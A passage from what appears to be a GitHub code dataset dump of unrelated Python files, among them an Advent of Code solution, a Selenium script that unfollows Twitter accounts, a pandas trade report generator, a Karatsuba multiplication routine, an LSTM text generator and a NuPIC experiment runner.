Don't ask how they tie the bow, though; they'll never tell.\n\nHow many total feet of ribbon should they order?\n\"\"\"\nfrom dataclasses import dataclass\nfrom typing import Iterator, List\n\n\n@dataclass\nclass Present:\n \"\"\"Representation of a perfect right rectangular prism.\"\"\"\n\n length: int\n width: int\n height: int\n\n def __post_init__(self) -> None:\n \"\"\"Calculate remaining box dimensions.\"\"\"\n self.length_wise_area = self.length * self.width\n self.width_wise_area = self.width * self.height\n self.height_wise_area = self.height * self.length\n self.total_area = (\n 2 * self.length_wise_area\n + 2 * self.width_wise_area\n + 2 * self.height_wise_area\n )\n length_wise_perimeter = 2 * self.length + 2 * self.width\n width_wise_perimeter = 2 * self.width + 2 * self.height\n height_wise_perimeter = 2 * self.height + 2 * self.length\n perimeters = {\n length_wise_perimeter,\n width_wise_perimeter,\n height_wise_perimeter,\n }\n self.shortest_perimeter = min(perimeters)\n\n def __iter__(self) -> Iterator:\n \"\"\"Provide unpackable dimensions.\"\"\"\n return iter((self.length, self.width, self.height))\n\n\n@dataclass\nclass Calculator:\n \"\"\"Calculator to measure total square feet of wrapping paper for\n a list of presents.\n \"\"\"\n\n presents: List[Present]\n\n def calculate_wrapping_paper(self) -> int:\n \"\"\"Return total needed square feet of wrapping paper for the\n presents.\n \"\"\"\n return sum(self._calculate_square_feet(present) for present in self.presents)\n\n def calculate_ribbon(self) -> int:\n \"\"\"Return total needed length of ribbon for the presents.\"\"\"\n return sum(self._calculate_ribbon_length(present) for present in self.presents)\n\n def _calculate_square_feet(self, present: Present) -> int:\n \"\"\"Return total needed square feet of wrapping paper for a\n present.\n \"\"\"\n return present.total_area + min(\n present.length_wise_area, present.width_wise_area, present.height_wise_area\n )\n\n def _calculate_ribbon_length(self, present: Present) -> int:\n \"\"\"Return length of ribbon needed for a single present.\"\"\"\n return present.shortest_perimeter + (\n present.length * present.width * present.height\n )\n\n\nif __name__ == \"__main__\":\n with open(\"aoc_2015/inputs/day_02_part_1.txt\") as data:\n presents = [\n Present(*[int(dimension) for dimension in dimensions.split(\"x\")])\n for dimensions in data\n ]\n\n calculator = Calculator(presents)\n print(calculator.calculate_wrapping_paper())\n print(calculator.calculate_ribbon())\n","repo_name":"walshification/advent-of-code","sub_path":"aoc_2015/day_02.py","file_name":"day_02.py","file_ext":"py","file_size_in_byte":3957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"39096030608","text":"# This code script is written by @recberdeniz to exercise about python selenium application for Python Programming\n# Python selenium twitter script for find\n# followed people, mutual following and just your followed.\n# Also this script can automatically unfollow just your followed people\n# Postscript: I used Mozilla Firefox as a web driver please check that your web driver option and revise the script.\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.firefox.options import Options\nfrom selenium.common import exceptions\nimport time\nusernames = list()\nusers = list()\nulist = list()\nmutual_list = list()\nto_getid = list()\noptions = Options()\noptions.binary_location = r'C:\\Program 
Files\\Mozilla Firefox\\firefox.exe'\nbrowser = webdriver.Firefox(executable_path=r'C:\\Users\\blue_\\anaconda3\\geckodriver.exe', options=options)\nbrowser.get(\"https://twitter.com/\")\ntime.sleep(5)\nlogin = browser.find_element(By.XPATH, \"//*[@id='layers']/div/div[1]/div/div/div/div/div/div/div/div[1]/a\")\nlogin.click()\ntime.sleep(3)\nusername = browser.find_element(By.XPATH, \"//*[@id='layers']/div[2]/div/div/div/div/div/div[2]/div[2]/div/div/div[2]/div[2]/div/div/div/div[5]/label/div/div[2]/div/input\")\nusername.send_keys(\"Enter your e-mail or username\") # twitter username or email key section\nforward = browser.find_element(By.XPATH, \"//*[@id='layers']/div[2]/div/div/div/div/div/div[2]/div[2]/div/div/div[2]/div[2]/div/div/div/div[6]/div\")\ntime.sleep(3)\nforward.click()\ntime.sleep(3)\npassword = browser.find_element(By.XPATH, \"//*[@id='layers']/div[2]/div/div/div/div/div/div[2]/div[2]/div/div/div[2]/div[2]/div[1]/div/div/div[3]/div/label/div/div[2]/div[1]/input\")\npassword.send_keys(\"Enter your password\") # twitter password key section\nuserlogin = browser.find_element(By.XPATH, \"//*[@id='layers']/div[2]/div/div/div/div/div/div[2]/div[2]/div/div/div[2]/div[2]/div[2]/div/div[1]/div/div/div/div/span/span\")\nuserlogin.click()\ntime.sleep(5)\nprofile_widget = browser.find_element(By.XPATH, \"//*[@id='react-root']/div/div/div[2]/header/div/div/div/div[1]/div[2]/nav/a[7]/div\")\ntime.sleep(2)\nprofile_widget.click()\ntime.sleep(5)\nfollowed_widget = browser.find_element(By.CSS_SELECTOR, \".css-4rbku5.css-18t94o4.css-901oao.r-18jsvk2.r-1loqt21.r-37j5jr.r-a023e6.r-16dba41.r-rjixqe.r-bcqeeo.r-qvutc0\")\nfollowed_widget.click()\ntime.sleep(5)\ntry:\n for followed in browser.find_elements(By.CSS_SELECTOR, \"div[data-testid='cellInnerDiv']\"):\n users.append(followed.text)\nexcept exceptions.StaleElementReferenceException:\n pass\ntime.sleep(2)\nlenOfPage = browser.execute_script(\"window.scrollTo(0, document.body.scrollHeight); var lenOfPage = document.body.scrollHeight; return lenOfPage;\")\nmatch = False\ncounter = 0\ntime.sleep(2)\nwhile match == False:\n time.sleep(3)\n lastCount = lenOfPage\n try:\n for followed in browser.find_elements(By.CSS_SELECTOR, \"div[data-testid='cellInnerDiv']\"):\n users.append(followed.text)\n time.sleep(3)\n lenOfPage = browser.execute_script(\"window.scrollTo(0, document.body.scrollHeight); var lenOfPage = document.body.scrollHeight; return lenOfPage;\")\n\n if lenOfPage == lastCount:\n match = True\n except exceptions.StaleElementReferenceException:\n pass\ntime.sleep(3)\n\nulist = list(dict.fromkeys(users)) # When browser getting data from html selector, some of elements could be duplicated, we need to remove duplicate elements\n\nfor i in ulist:\n if \"Seni takip ediyor\" in i: # It is depending on your language and \"Seni takip ediyor\" means that \"Following you\" in Turkish, please check with your language and change the string\n mutual_list.append(i)\n\njust_followed = [i for i in ulist if i not in mutual_list] # list comprehension method to subtract between followed people and mutual following\n\n# This part of code, creates three different text folder that includes all of your followed people, mutual followed and just your followed\nwith open(\"followed_people.txt\", \"w\", encoding=\"UTF-8\") as file:\n for i in ulist:\n file.write(i + \"\\n\")\n file.write(\"**************************\\n\")\n\nwith open(\"mutual_followed.txt\", \"w\", encoding=\"UTF-8\") as file:\n for i in mutual_list:\n file.write(i + \"\\n\")\n 
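        # one followed account per block: the scraped cell text, then a separator line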
file.write(\"**************************\\n\")\n\nwith open(\"just_followed.txt\", \"w\", encoding=\"UTF-8\") as file:\n for i in just_followed:\n file.write(i + \"\\n\")\n file.write(\"**************************\\n\")\n# end of text folder process\n# Here is a setting process that before unfollowing process,\n# every list has one null cell and we need to filter and remove, thats why we put this code here.\njust_followed = filter(None, just_followed)\nfor i in just_followed:\n to_getid.append(i.split(\"\\n\"))\ntime.sleep(2)\n# Here is the last part of this application that check the username who are not followed you going to unfollow from you.\nfor i in to_getid:\n time.sleep(3)\n browser.get(\"https://twitter.com/\" + i)\n try:\n time.sleep(5)\n unf = browser.find_element(By.CSS_SELECTOR,\n \"div[data-testid='placementTracking']\")\n unf.click()\n time.sleep(2)\n unf_second = browser.find_element(By.XPATH,\n \"//*[@id='layers']/div[2]/div/div/div/div/div/div[2]/div[2]/div[2]/div[1]/div/span/span\")\n unf_second.click()\n except Exception:\n print(\"Here is a problem check this user \" + i)\ntime.sleep(3)\nbrowser.close()\n","repo_name":"recberdeniz/Python_Selenium_Twitter","sub_path":"selenium_tw_follower.py","file_name":"selenium_tw_follower.py","file_ext":"py","file_size_in_byte":5509,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"42066710590","text":"import logging\n\nimport pandas as pd\n\nfrom configs.processed_future_movement import future_movement_config\n\nclass ReportGenerator:\n def __init__(self, input_filename, output_filename, field_configs):\n self.output_filename = output_filename\n self.field_configs = field_configs\n self.input_filename = input_filename\n\n try:\n self.input_df = pd.read_fwf(\n self.input_filename,\n colspecs=self.get_colspecs(self.field_configs),\n names=self.get_colnames(self.field_configs),\n )\n logging.debug(\"loading input from {} to the dataframe is successful\".format(self.input_filename))\n except FileNotFoundError:\n logging.exception(\"Check if the file exists or the filename is correct\".format(self.input_filename))\n raise\n\n # For testability reason the output_df is maintained as the class attribute\n # Otherwise can be a local variable before writing the CSV into the disk\n self.output_df = None\n\n @staticmethod\n def get_colspecs(field_configs):\n \"\"\"\n Receives a fields configuration object which contains list of column name names and the tuples of their starting and ending positions.\n\n Returns a list of tuples with offset off by 1 so that it can be used by Pandas to extract fixed-width data.\n \"\"\"\n global f\n logging.debug(\"extracting colspecs from field_configs\")\n try:\n # return [(f[1] - 1, f[2]) for f in field_configs]\n colspecs = []\n for f in field_configs:\n assert len(f) == 3\n assert isinstance(f[0], str)\n assert isinstance(f[1], int)\n assert isinstance(f[2], int)\n assert f[1] <= f[2]\n colspecs.append((f[1] - 1, f[2])) # Offset by since Pandas' index starts with 0\n return colspecs\n\n except (TypeError, IndexError, AssertionError):\n logging.exception(\"Error in parsing the configuration at ine {}\".format(f))\n raise\n\n @staticmethod\n def get_colnames(field_configs):\n global f\n logging.debug(\"extracting column names from field_configs\")\n # return [f[0] for f in field_configs]\n\n try:\n colnames = []\n for f in field_configs:\n assert len(f) == 3\n assert isinstance(f[0], str)\n assert f[0] # Column name cannot be empty\n 
colnames.append(f[0]) # Offset by 1 since Pandas' index starts with 0\n return colnames\n\n except (TypeError, IndexError, AssertionError):\n logging.exception(\"Error in parsing the configuration at ine {}\".format(f))\n raise\n\n def summary_report(self):\n \"\"\"\n Update: Separating report generation and the dataframe manipulation\n So that the dataframe manipulation can be tested in an isolated manner instead of complex mocking of files.\n\n This method is responsible for,\n For each executed trade entries\n Group by clients and product info\n Calculate sum of the total transaction amount\n Update the self.output_df\n \"\"\"\n # client_info and product_info can be list of columns, used by Pandas while doing groupby\n client_info = [\n \"client_type\",\n \"client_number\",\n \"account_number\",\n \"subaccount_number\",\n ]\n product_info = [\n \"exchange_code\",\n \"product_group_code\",\n \"symbol\",\n \"transaction_date\",\n ]\n\n # Calculate the total_transaction_amount using quantity_long - quantity_short\n self.input_df[\"total_transaction_amount\"] = self.input_df[\"quantity_long\"] - self.input_df[\"quantity_short\"]\n\n # The actual logic that does the groupby magic and calculate the sum\n self.output_df = self.input_df.groupby(client_info + product_info, as_index=False)[\"total_transaction_amount\"].sum()\n\n def generate_report(self, method):\n \"\"\"\n This method is responsible for,\n Receive method name as parameter\n Invoke the method\n Write the output_df to .csv file\n\n The method has been parameterised so that when new types of reports implemented the method name can be passed as parameter from the main function.\n \"\"\"\n\n # Invoke the method\n method(self)\n\n # Write the .csv output to the desired output filepath.\n self.output_df.to_csv(self.output_filename, index=False)\n\n logging.debug(\"Output file {} is saved to the disk\".format(self.output_filename))\n\ndef main():\n logging.basicConfig(\n level=logging.DEBUG,\n filename=\"logs/challenge.log\",\n format=\"%(asctime)s %(levelname)s %(filename)s:%(lineno)d FUNC:%(funcName)s() %(message)s\",\n )\n\n logging.debug(\"Program started\")\n\n # Create a ReportGenerator() object\n # To create ReportGenerator object we need input file, and an output filepath and a configuration object\n rg = ReportGenerator(\"data/input.txt\", \"data/output.csv\", future_movement_config)\n\n # Generate the summary report\n rg.generate_report(ReportGenerator.summary_report)\n\n logging.debug(\"Program ended\")\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"n3h3m/abnamro_challenge","sub_path":"report_generator.py","file_name":"report_generator.py","file_ext":"py","file_size_in_byte":5347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"41660784057","text":"import speech_recognition as sr\r\nfrom googletrans import Translator\r\n\r\n# Function to transcribe live audio from the microphone\r\ndef transcribe_live_audio():\r\n recognizer = sr.Recognizer()\r\n\r\n # Open the microphone and start recording\r\n with sr.Microphone() as source:\r\n print(\"Listening...\")\r\n audio = recognizer.listen(source)\r\n\r\n try:\r\n transcription = recognizer.recognize_google(audio, language=\"en-IN\")\r\n return transcription\r\n except sr.UnknownValueError:\r\n print(\"Speech recognition could not understand audio.\")\r\n return None\r\n except sr.RequestError as e:\r\n print(f\"Could not request results from Google Speech Recognition service; {e}\")\r\n return None\r\n\r\n# 
Function to translate text to English\r\ndef translate_text(text):\r\n translator = Translator()\r\n translated = translator.translate(text, src=\"auto\", dest=\"en\")\r\n return translated.text\r\n\r\n# Transcribe live audio\r\ntranscription = transcribe_live_audio()\r\n\r\nif transcription:\r\n print(f\"Transcription: {transcription}\")\r\n \r\n # Translate the transcription to English\r\n translation = translate_text(transcription)\r\n print(f\"Translation: {translation}\")\r\nelse:\r\n print(\"Transcription failed or empty.\")\r\n","repo_name":"lokeshwaran173/transcript","sub_path":"sih 1456/real time aud.py","file_name":"real time aud.py","file_ext":"py","file_size_in_byte":1263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"8623304263","text":"import logging\n\n\ndef karatsuba(x: int, y: int) -> int:\n ''' Implementation of the Karatsuba multiplication algorithm. '''\n\n # When the numbers are small enough, just do the\n # default way.\n if x < 16 or y < 16:\n return x * y\n\n # Get bit half the length of the bigger number.\n n = max(x.bit_length(), y.bit_length()) // 2\n\n # Left shift, (2 ^ n) - 1\n mask = (1 << n) - 1\n\n # Right shift, x / 2 ^ n\n a, c = x >> n, y >> n\n\n # Bitwise and.\n b, d = x & mask, y & mask\n\n # A * C.\n part_1 = karatsuba(a, c)\n # B * D.\n part_2 = karatsuba(b, d)\n # (A+B) * (C+D) - A*C - B*D\n part_3 = karatsuba(a+b, c+d) - part_1 - part_2\n\n # ((AC * 2 ^ n) + (A+B) * (C+D) - AC - BD) * 2 ^ n ) + BD.\n return (((part_1 << n) + part_3) << n) + part_2\n\n\ndef main():\n\n # Some kinda large integer.\n x = 3141592653589793238462643383279502884197169399375105820974944592\n y = 2718281828459045235360287471352662497757247093699959574966967627\n\n return karatsuba(x, y)\n\n\nif __name__ == '__main__':\n\n logging.basicConfig(level=logging.INFO)\n\n result = main()\n\n logging.info(f'The result is {result}')\n","repo_name":"ByteByBit/algorithm_implementations","sub_path":"karatsuba/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1152,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"37839620291","text":"from random import randint\nj = 0\nfor i in range(50000):\n data = []\n data.append(j)\n data.append((randint(0, 9)))\n j = j + 1\n with open(\"/home/vaibhav/Desktop/linear_data40k.csv\",\"a\") as file:\n file.write(str(data))\n file.write(\"\\n\")\n\n","repo_name":"pooniavaibhav/sparkAI","sub_path":"DataCreation.py","file_name":"DataCreation.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"18834969285","text":"import sys\n\nmonths = {\n 'Jan': 0,\n 'Feb': 1,\n 'Mar': 2,\n 'Apr': 3,\n 'May': 4,\n 'Jun': 5,\n 'Jul': 6,\n 'Aug': 7,\n 'Sep': 8,\n 'Oct': 9,\n 'Nov': 10,\n 'Dec': 11\n}\n\nlines = open(sys.argv[1], 'r')\n\nfor line in lines:\n line = line.strip()\n if line == '':\n continue\n \n # Make a big dict up front\n results = {i: [False for _ in range(12)] for i in range(1990, 2021)}\n dates = line.split('; ')\n \n for date in dates:\n start_string, end_string = date.split('-')\n start_month, start_year = [int(months.get(i, i)) for i in start_string.split()]\n end_month, end_year = [int(months.get(i, i))for i in end_string.split()]\n range_years = range(start_year, end_year + 1)\n\n for y in range_years:\n start_point = start_month if y == start_year else 0\n end_point = end_month + 1 if y == end_year else 12\n 
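            # only the first year is clipped at start_month and only the last
            # at end_month; every year in between counts all 12 months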
for month in range(start_point, end_point):\n results[y][month] = True\n\n months = sum(sum(1 for j in results[i] if j) for i in results.keys())\n print(str(months // 12))\n\nlines.close()","repo_name":"robertlagrant/codeeval","sub_path":"Easy/139/solution2.py","file_name":"solution2.py","file_ext":"py","file_size_in_byte":1119,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"8110716761","text":"import unittest\nfrom pyravendb.tests.test_base import TestBase\n\n\nclass TestDelete(TestBase):\n def test_put_success(self):\n self.db.put(\"testing/1\", {\"Name\": \"test\"}, None)\n response = self.db.get(\"testing/1\")\n self.assertEqual(response[\"Results\"][0][\"@metadata\"][\"@id\"], \"testing/1\")\n\n def test_put_fail(self):\n with self.assertRaises(ValueError):\n self.db.put(\"testing/2\", \"document\", None)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"neil-dot-ca/RavenDB-Python-Client","sub_path":"pyravendb/tests/database_commands_tests/test_put.py","file_name":"test_put.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"40"} +{"seq_id":"23987688648","text":"import torch\nimport os\nimport torch.nn as nn\nimport numpy as np\nfrom torch.nn.utils import clip_grad_norm_\nimport argparse\nimport logging\nimport nltk\nnltk.download('punkt')\nfrom nltk.tokenize import word_tokenize\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"Train a text generation model using LSTM\")\n parser.add_argument('--input_file', type=str, default=\"book1.txt\", help=\"Path to the input text file\")\n parser.add_argument('--output_file', type=str, default=\"results.txt\", help=\"Path to the output text file\")\n parser.add_argument('--embed_size', type=int, default=512, help=\"Size of the word embeddings\")\n parser.add_argument('--hidden_size', type=int, default=4096, help=\"Size of the LSTM hidden state\")\n parser.add_argument('--num_layers', type=int, default=1, help=\"Number of LSTM layers\")\n parser.add_argument('--num_epochs', type=int, default=20, help=\"Number of training epochs\")\n parser.add_argument('--batch_size', type=int, default=12, help=\"Batch size for training\")\n parser.add_argument('--timesteps', type=int, default=50, help=\"Timesteps for truncated backpropagation through time\")\n parser.add_argument('--learning_rate', type=float, default=0.001, help=\"Learning rate for the optimizer\")\n parser.add_argument('--generated_word',type = int,default=100, help=\"How many word you want to generate\")\n args = parser.parse_args()\n\nlogging.basicConfig(\n level=logging.INFO,\n format=\"%(asctime)s [%(levelname)s] %(message)s\",\n handlers=[logging.StreamHandler()])\n\nembed_size = args.embed_size\nhidden_size = args.hidden_size\nnum_layers = args.num_layers\nnum_epochs = args.num_epochs\nbatch_size = args.batch_size\ntimesteps = args.timesteps\nlearning_rate = args.learning_rate\n\nclass Dic(object):\n def __init__(self):\n self.word_to_index = {}\n self.index_to_word = {}\n self.index = 0\n\n def add(self,word):\n if word not in self.word_to_index:\n self.word_to_index[word] = self.index\n self.index_to_word[self.index] = word\n self.index += 1\n\n def __len__(self):\n return len(self.word_to_index)\n\nclass Text(object):\n def __init__(self):\n self.dictionary = Dic()\n\n def get_data(self, path, batch_size):\n with open(path, \"r\", encoding='utf-8') as f:\n token = 0\n for line in f:\n tokens = 
word_tokenize(line)\n token += len(tokens)\n for word in tokens:\n self.dictionary.add(word)\n rep_tensor = torch.LongTensor(token)\n index = 0\n with open(path, \"r\", encoding='utf-8') as f:\n for line in f:\n tokens = word_tokenize(line)\n for word in tokens:\n if word in self.dictionary.word_to_index:\n rep_tensor[index] = self.dictionary.word_to_index[word]\n index += 1\n num_batches = rep_tensor.shape[0] // batch_size\n rep_tensor = rep_tensor[:num_batches * batch_size]\n rep_tensor = rep_tensor.view(batch_size, -1)\n return rep_tensor\n\nclass TextGen(nn.Module):\n def __init__(self,vocab_size,embed_size,hidden_size,num_layers) :\n super(TextGen,self).__init__()\n\n self.embed = nn.Embedding(vocab_size,embed_size)\n self.lstm = nn.LSTM(embed_size,hidden_size,num_layers,batch_first = True)\n self.linear = nn.Linear(hidden_size, vocab_size)\n\n def forward(self, x, h):\n x = self.embed(x)\n out, (h, c) = self.lstm(x, h)\n out = out.reshape(out.size(0) * out.size(1), out.size(2))\n out = self.linear(out)\n return out, (h, c)\n\ncorpus = Text()\nrep_tensor = corpus.get_data(args.input_file, batch_size)\nvocab_size = len(corpus.dictionary)\nnum_batches = rep_tensor.shape[1] // timesteps\n\nmodel = TextGen(vocab_size, embed_size, hidden_size, num_layers)\nloss_fn = nn.CrossEntropyLoss()\noptimizer = torch.optim.Adam(model.parameters(), lr=learning_rate)\n\nfor epoch in range(num_epochs):\n states = (torch.zeros(num_layers, batch_size, hidden_size),\n torch.zeros(num_layers, batch_size, hidden_size))\n\n for i in range(0, rep_tensor.size(1) - timesteps, timesteps):\n input = rep_tensor[:, i:i + timesteps]\n target = rep_tensor[:, (i + 1):(i + 1) + timesteps]\n outputs, _ = model(input, states)\n loss = loss_fn(outputs, target.reshape(-1))\n model.zero_grad()\n loss.backward()\n clip_grad_norm_(model.parameters(), 0.5)\n optimizer.step()\n\n step = (i + 1) // timesteps\n\n logging.info(\"Epoch[{}/{}],Loss : {:.4f}\".format(epoch + 1, num_epochs, loss.item()))\n\nwith torch.no_grad():\n with open(args.output_file, \"w\") as f:\n state = (torch.zeros(num_layers, 1, hidden_size),\n torch.zeros(num_layers, 1, hidden_size))\n input = torch.randint(0, vocab_size, (1,)).long().unsqueeze(1)\n\n for i in range(args.generated_word):\n output, _ = model(input, state)\n prob = output.exp()\n word_id = torch.multinomial(prob, num_samples=1).item()\n\n input.fill_(word_id)\n\n word = corpus.dictionary.index_to_word[word_id]\n word = \"\\n\" if word == \"\" else word + \" \"\n f.write(word)\n if (i + 1) % 10 == 0:\n logging.info(\"Sampled [{}/{}] words and saved to {}\".format(i + 1, args.generated_word, args.output_file))","repo_name":"CaglarGuher/Text-Generation-using-LSTM","sub_path":"lstm_text_gen.py","file_name":"lstm_text_gen.py","file_ext":"py","file_size_in_byte":5463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"29241882730","text":"import numpy\nimport itertools\nimport json\nimport cPickle as pickle\nimport zlib\nfrom time import (sleep)\nimport threading\nimport multiprocessing\nimport copy\nimport datetime\nimport pymongo\nimport pprint\nimport gevent\nimport sys\nimport os\nimport cStringIO as StringIO\n\n\nfrom collections import namedtuple\nfrom Queue import Empty\nfrom multiprocessing import Queue\n\nfrom experiment_db import ExperimentDB\n\n\n\nimport nupic.frameworks.opf.opfutils\nfrom nupic.frameworks.opf.opfutils import (InferenceType,\n InferenceElement)\nimport nupic.frameworks.opf.opfhelpers as opfhelpers\nimport 
nupic.frameworks.opf.opfbasicenvironment as opfbasicenv\nfrom nupic.frameworks.opf.modelfactory import ModelFactory\nfrom nupic.data.dictutils import DictObj\n\nfrom runner import Runner\n\n\n\nSimulationDataElement = namedtuple('SimulationDataElement',\n ['record',\n 'modelResult',\n 'sourceScalars',\n 'sensorBUOut',\n 'SPBUOut',\n 'overlaps',\n 'nConnectedInputs',\n 'predictedCols',\n 'predictedConfidences',\n 'tpActive',\n 'tpPredicted',\n 'permanences',\n 'sensorPredicted'])\n\n############################################################################\nclass ExperimentRunner(Runner):\n\n\n def _formatActiveCells(self, activeCells):\n numCells = activeCells.sum(1)\n formattedCells = zip(numpy.where(numCells == 32)[0].tolist(),\n itertools.repeat(\"burst\"))\n singleCells = activeCells[numCells != 32, :].nonzero()\n formattedCells.extend(zip(*(l.tolist() for l in singleCells)))\n return formattedCells\n\n\n def _runExperimentLoop(self, queue):\n\n self.prevFieldPred = {}\n\n self._model.resetSequenceStates()\n\n cOut = os.fdopen(os.open(\"/tmp/cerebro.cout\", os.O_RDWR | os.O_CREAT), 'w+')\n oldC = os.dup(1)\n\n collection = ExperimentDB.getExperimentDB(self.name)\n\n while self._maxiterations == -1 or self._iteration <= self._maxiterations:\n try:\n # Get next record\n record = self._dataset.getNextRecord()\n\n except StopIteration:\n self._isFinished.set()\n return None\n\n if self._stop.isSet():\n break\n\n # Feed record to model and get prediction. Capture all the stdout as well\n os.dup2(cOut.fileno(), 1)\n\n modelResult = self._model.run(record)\n\n os.dup2(oldC, 1)\n\n cOut.seek(0)\n verboseOutput = cOut.read()\n cOut.truncate(0)\n\n modelResult.inferences['encodings'] = None\n modelResult.sensorInput.dataEncodings = None\n\n model = self._model\n sensor = model._getSensorRegion()\n sp = model._getSPRegion()\n tp = model._getTPRegion()\n cl = model._getClassifierRegion()\n\n spImp = None\n tpImp = None\n\n if sp is not None:\n spImp = sp.getSelf()._sfdr\n if tp is not None:\n tpImp = tp.getSelf()._tfdr\n clImp = cl.getSelf()._claClassifier\n\n #Copy all the pertinent data\n sourceScalars = copy.deepcopy(sensor.getOutputData('sourceOut'))\n sensorBits = sensor.getOutputData('dataOut')\n sensorBUOut = sensorBits.nonzero()[0].tolist()\n\n SPBUOut = []\n nConnectedInputs = []\n overlaps = []\n\n if spImp is not None:\n SPBUOut = sp.getOutputData('bottomUpOut').nonzero()[0].tolist()\n nConnectedInputs = spImp._allConnectedM.nNonZerosPerRow()[SPBUOut].astype('int32').tolist()\n overlaps = zip(SPBUOut,\n spImp._overlapsNoBoost[SPBUOut].astype('int32').tolist())\n\n\n TPTDOut = tp.getOutputData('topDownOut') if tp else None\n sensorTDIn = sensor.getInputData('temporalTopDownIn')\n\n permanences = {}\n predictedCols = ()\n predictedConfidences = ()\n tpInfActiveCells = ()\n tpLrnActiveCells = ()\n tpPredCells = []\n\n if TPTDOut is not None:\n predictedCols = TPTDOut.nonzero()[0].tolist()\n predictedConfidences = TPTDOut[predictedCols].tolist()\n tpInfActiveCells = self._formatActiveCells(tpImp.infActiveState['t'])\n tpLrnActiveCells = self._formatActiveCells(tpImp.lrnActiveState['t'])\n tpInfPredT_1 = self._formatActiveCells(tpImp.infPredictedState['t-1'])\n tpInfPredT = self._formatActiveCells(tpImp.infPredictedState['t'])\n tpPredCells = tpImp.infPredictedState['t'].nonzero()[0].tolist()\n\n sensorPredBits = []\n if sensorTDIn is not None:\n sensorPredBits = sensorTDIn\n\n if self.prevPredictedCols is None:\n self.prevPredictedCols = []\n self.prevTPPredictedCells = []\n 
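        # first record: no prediction from t-1 exists yet, so seed the
        # "previous step" caches with empty lists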
self.prevPredictedConfs = []\n self.prevTPPredicted = []\n\n clPattern = clImp._patternNZHistory[-1]\n step = clImp.steps[0]\n bitHistories = {}\n\n fieldActivations = {}\n fieldPredictions = {}\n for fieldName, (start, stop) in self.fieldRanges.iteritems():\n nzBits = sensorBits[start:stop].nonzero()[0]\n fieldActivations[fieldName] = nzBits.tolist()\n nzBits = sensorPredBits[start:stop].nonzero()[0]\n fieldPredictions[fieldName] = nzBits.tolist()\n\n predictedField = self._modelDescription[\"predictedField\"]\n predictedFieldIndex = self.getFieldNames().index(self.predictedField)\n actual = modelResult.sensorInput.dataRow[predictedFieldIndex]\n\n dthandler = lambda obj: obj.isoformat() if isinstance(obj,\n datetime.datetime) \\\n else None\n record = {\"_id\":self._iteration,\n \"actual\": actual,\n \"SPBUOut\":SPBUOut,\n \"overlaps\":overlaps,\n \"predictedCols\": self.prevPredictedCols,\n \"tpInfActive\": tpInfActiveCells,\n \"tpLrnActive\": tpLrnActiveCells,\n \"tpPredicted\": self.prevTPPredictedCells,\n \"tpInfPredT_1\":tpInfPredT_1,\n \"tpInfPredT\":tpInfPredT,\n \"permanences\": permanences,\n \"overlaps\": overlaps,\n \"inferences\": json.dumps(modelResult.inferences),\n \"record\":json.dumps(modelResult.rawInput,\n default=dthandler),\n \"fieldActivations\":fieldActivations,\n #TODO: for some reason, field predictions don't need to be shifted??\n \"fieldPredictions\": fieldPredictions,\n \"verboseOutput\": verboseOutput,\n }\n\n collection.insert(record)\n\n self._dataQ.put(record)\n\n self.prevPredictedCols = predictedCols\n self.prevTPPredictedCells = tpPredCells\n self.prevPredictedConfs = predictedConfidences\n #self.prevTPPredicted = tpPredCells\n self.prevTPPredicted = None\n self.prevFieldPred = fieldPredictions\n\n self._iteration += 1\n gevent.sleep(0)\n\n os.close(oldC)\n cOut.close()\n self._isFinished.set()\n\n def auxText(self, timestep, experimentData):\n auxText = []\n import pprint\n auxText.append(\"-----------------------------------------------------------\")\n auxText.append( \"Data at time: %s\" % timestep)\n\n auxText.append(\"\\nRaw Input\")\n auxText.append(pprint.pformat(experimentData[\"record\"]))\n\n auxText.append(\"\\nInferences\")\n auxText.append(pprint.pformat(json.loads(experimentData[\"inferences\"])))\n\n #auxText.append(\"Sensor predicted\")\n #auxText.append(pprint.pformat(experimentData.sensorPredicted))\n\n # auxText.append(\"\\nOverlaps\")\n # auxText.append(pprint.pformat(experimentData[\"overlaps\"]))\n\n #auxText.append(\"\\nConfidences\")\n #auxText.append(pprint.pformat(zip(experimentData.predictedCols,\n # experimentData.predictedConfidences)))\n #\n # auxText.append(\"\\nInference TPCells\")\n # auxText.append(pprint.pformat(experimentData[\"tpInfActive\"]))\n\n # auxText.append(\"\\ntpInfPredT_1\")\n # auxText.append(pprint.pformat(experimentData[\"tpInfPredT_1\"]))\n\n # auxText.append(\"\\ntpInfPredT\")\n # auxText.append(pprint.pformat(experimentData[\"tpInfPredT\"]))\n\n auxText.append(\"\\nVerbose Output:\")\n auxText.append(experimentData[\"verboseOutput\"])\n\n # auxText.append(\"Weak Match Pred Cols\")\n # auxText.append(pprint.pformat(experimentData[\"predictedCols\"]))\n\n\n #auxText.append(\"\\nDecrements\")\n #auxText.append(pprint.pformat(zip(experimentData.SPBUOut,\n # experimentData.nConnectedInputs)))\n\n # auxText.append(\"\\nBit Histories\")\n # auxText.append(pprint.pformat(experimentData[\"bitHistories\"]))\n\n\n return 
